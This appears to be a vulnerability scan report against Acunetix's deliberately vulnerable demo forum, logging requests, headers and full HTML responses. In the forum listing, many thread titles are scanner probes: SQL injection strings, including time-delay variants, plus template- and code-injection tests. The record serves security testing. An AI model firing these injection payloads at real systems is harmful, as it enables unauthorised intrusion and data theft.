style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 410 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3673 |
Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 2809 |
Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 478 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:11 GMT Content-Length: 2976 |
Response Body - size: 2,976 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'YKSrENiG'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 340 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 2961 |
Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 324 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 17817 |
Response Body - size: 17,817 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>12345'"\'\");|]*</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>-1 OR 3+627-627-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>'.print(md5(31337)).'</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%></a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>-1 OR 3*2<(0+5+627-627) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>-1 OR 3*2>(0+5+627-627) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>-1 OR 2+497-497-1=0+0+0+1</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>acx{{98991*97996}}xca</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>-1 OR 3+497-497-1=0+0+0+1</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>acx[[${98991*97996}]]xca</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>-1 OR 3*2<(0+5+497-497)</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>acx__${98991*97996}__::.x</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>-1 OR 3*2>(0+5+497-497)</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>-1' OR 2+737-737-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>-1' OR 3+737-737-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>-1' OR 3*2<(0+5+737-737) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>-1' OR 3*2>(0+5+737-737) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=41'>-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=42'>-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:53 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=43'>-1" OR 2+781-781-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=44'>-1" OR 3+781-781-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:54 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=45'>-1" OR 3*2<(0+5+781-781) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:54 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=46'>-1" OR 3*2>(0+5+781-781) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:54 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=47'>1 waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:55 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=48'>UGrs47CJ'; waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:55 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=49'>KHr20UMM'); waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:55 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=50'>NebDWBkM')); waitfor delay '0:0:15' -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:56 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=51'>qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))--</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:56 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=52'>APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))--</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:57 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=53'>ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))--</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:57 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=54'>Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:58 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=55'>if(now()=sysdate(),sleep(15),0)</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:59 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=56'>0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:15 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a 